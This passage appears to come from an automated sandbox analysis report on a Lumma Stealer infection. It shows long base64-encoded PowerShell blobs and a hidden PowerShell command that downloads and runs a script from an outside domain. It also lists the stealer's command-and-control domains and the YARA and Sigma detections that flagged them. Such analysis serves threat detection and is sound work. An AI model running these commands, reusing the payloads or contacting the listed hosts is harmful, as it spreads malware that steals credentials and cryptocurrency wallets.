4AcgBEAEEAcABwAHoASwBNAG8AdwB5AFoAVgByAGgASgBOAHYAOAAyAFIANgBmAHUAUgBuAEcANgA5ADQAagBOAHgANABJAGIAcwBXAGQANABrAGgAdQBLADUAVgBTAEIAbgBoAGkAawBsAEkAaQBlAFcAeQBLAFgAUgBsAGYAMgBwAFEAZgBwAFQAUQBpADcAQgBBAEgASQBoAGEAbgBvAHgASQAwAGgASQBUAG4AZABVAGsASQBCAGYAdABEAFQAMwBQAEYAQwBZAEoAZgBHAEgAZgBUAEcAWABMADEAaQB1AEIAQgBxADMASABYAHUASQBmAGUAeABQAFQAUAB3AFoARABzADIAcgBQAEIANgBxAE4AcgBMAGsAcQBtAE4AYwBPAHYAUAB4AFoAeAB0AHgAQwBrAFkANwBGADAAbABUAFUATgBOAFYAeAA0AE8AUgB3AHoAcgBWADAAWABCAEEAVgA4AEUANgBWAGsAbgBGAHAASgByADQAZgB4AFAAZwBKAHQAZgByAFgARwBHADYAaQAzADYASwBrAEkAOABzAGgAMwBSAGIANwBaAEYAVwA3ADYAbwB0AGIAVgA3AFkATgAzAG8AUAAzAEMAagBtAE0AdABNAHoAaABLAGIAMgAyAE0AOABuAEgAdwA0AGYAbwBNAHYAYwBHAHgATQBYADYARQBVAFIAUgBmADIAcABNAEMAaABTAGoASQA3AEIANQBXAHQAaAAyAG4AMwBQAHIANgBSAG8AaABKAG8ATwBQADYASwA2AFQATgBMAEwAOAB6AGYAdABSAFYAbABpAHoARABVAEMASQAxAGUAcABvAHMAMwBTAGMAMwAxAG0AVABvADAAWAA1AHQAcgBQAHAATgBOAFcAYwB0AEYAZABNAHIAMABXAEgAeQBWAHkASwBPAGgAZABsAFgAVgBYAGQASABlADMANAB0AGsAWgBZAFQAQwBVAHgASgB6AFgAYQBJADEAUgAwAEYATABTAHEAawBTAGcAUQBRAE8AUQBxADEAbQBmAGwASQBMAHEAeQB0ADQAegBXAFQAVgBPAEsATQBzAE8ARgBiAEwAUgBKAE4ATgA1AHkAZwBVADQAdQBWAEEAQQBTAGUAaQAyAG4AMgB6AHEAaQBWADAARABVAHkARABmAFEAOAAzAEIARwA5AHcAQQBMAEsAUgBDADkAcwBVAEEATQBHAGEAQwB2AFcAUABVAGYAVABrADYAMQB5AEMAWAB0AHMAdgB0AFgAZwB4AEkANQBZAGsAWQBFAHkAQQBJAHUAbABpAEEAdwBKAHQAYQByADQAVQBOAEgAWAB6AHYAQwBaAEEAdwB4AGEAVABlAHgAMwB0AGMATgBSAHoAcABQAHQAawBzADAATwBjAE0AZwBrAEcAaQBxAEoAMQBsAE4ATQBDAEcAawBPAGUAMwBrAHYASAA5AFgAYQA3AHIAMwBTAFAAMwBrAFUAeQBwAGIAMgB2AHgAUgAzAEQAbQBsAHcAbQBoAGgAcwBlAEwARQBmADkAaQBZAEwAZABCAE8AMwBYAFkAcwBjAFgAYgBDAEQAbQBhAGoAYQB0AGUAdAB3AHYANgBqAEQAZQBLAFYAMwB1AG8ASABaAFUAZABrAFcAUAA1ADAAUwBJAHQAbABXAFEAcABkAGUAZABVAEwAagBuAGwAcABCAEgATgBCAEEAeQB1AEIAOAB0AEsARABTAFIAdQBHAGEASABQAEYAVwBsAEEATwB5AGEASgBhAGoAIAAoACQAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAE0ATwBSAHkAcwBUAFIARQBBAE0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAEYAcgBvAG0AQgAiACAAKwAiAGEAcwBlADYAIgAgACsAIAAiADQAUwB0AHIAaQBuAGcAIgApACgAIgBOAFkAKwB4AGIAbwBNAHcARgBFAFYALwA1AFkAawBsAE0ATgBnAGsAYQBsAE4AVgAyAFMASQA2AFoASwBqAFMAUwBBAHcAcwBEAEQASAA0AEUAVgB3AFoAUAA4AHQAKwB3AGUASAB2AFMAMQBwADEAdgBIAGMANAA5ADkAeQBhAFYAVwBCAHgAQwBkAFIAagBqAEoAQgBWAGgANwBZAHgAVABsAE8ASwBiAGIAMwBFAGgAdABMAGIANgAzADkAeABvAFkAUwBoAEgAdABIAGEAZAB0ADcASgBiAGUAdQBmAE8AVAA2AHoAeABBAGQAbQBJAEkANwBoAGQAcAAvAFEAOABhAGUASgBEAEoAbABJAE0AQgBxAHQAMABZAEYAQQBEADkAMwBpADEAYwBvAFgAagBqAHkASQBpAHEAWgBKAE8AUQAzAFgAegBPAEEARAA4AHYAeQBNAFMAWAB4ADEAMwA5AGcAegByAEsATwBNAGsAegB3AGoAeQB3AGEANwB5AHAAcQBWAFYAOABnAFAAUwBzADYAUwAwAGoAVQBIADQAMgA3ADUAWgBtAFQAMgA4AFYAQwBXAHUASgBNAEQARwBVAHMAegBCAHIANABIAHAAMABJAHcAcwA3AEkAeQBqAHUAVABMAGYAZgArACsATgB5ADkAegBOADgAaABaAEQANQB1AGkAdQBHAGEAcgA0AHQAKwBWAG0AaABlAEwAYwBQAHEAMQArAHcARQA9ACIAKQApACkAKQAsACAAWwBpAG8ALgBjAE8AbQBwAHIARQBzAHMASQBvAG4ALgBjAG8AbQBQAHIARQBTAFMAaQBPAG4AbQBPAEQARQBdADoAOgAoACIARABlACIAIAArACIAYwBvAG0AcAByAGUAcwBzACIAKQApACkALAAgAFsAdABFAHgAdAAuAEUAbgBjAG8ARABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2104 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6096 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immolatechallen.bond", "growthselec.bond", "idealizetreez.shop", "jarry-fixxer.bond", "jarry-deatile.bond", "crookedfoshe.bond", "pain-temper.bond", "stripedre-lot.bond", "strivehelpeu.bond"], "Build id": "c2CoW0--RIII"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2473160112.000000000668F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000004.00000002.2473160112.0000000006898000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: powershell.exe PID: 1600JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 2104JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Process Memory Space: powershell.exe PID: 2104JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                Click to see the 4 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.2.powershell.exe.6819687.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  4.2.powershell.exe.6819687.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    4.2.powershell.exe.6898e70.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      4.2.powershell.exe.67d9667.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        4.2.powershell.exe.675c010.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          Click to see the 1 entries

                          Other

                          SourceRuleDescriptionAuthorStrings
                          amsi32_1600.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                            amsi32_2104.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: PowerShell Download and Execution Cradles
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: Suspicious Encoded PowerShell Command Line
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA
                              Sigma detected: Suspicious MSHTA Child Process
                              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA
                              Sigma detected: Suspicious PowerShell Encoded Command Patterns
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0A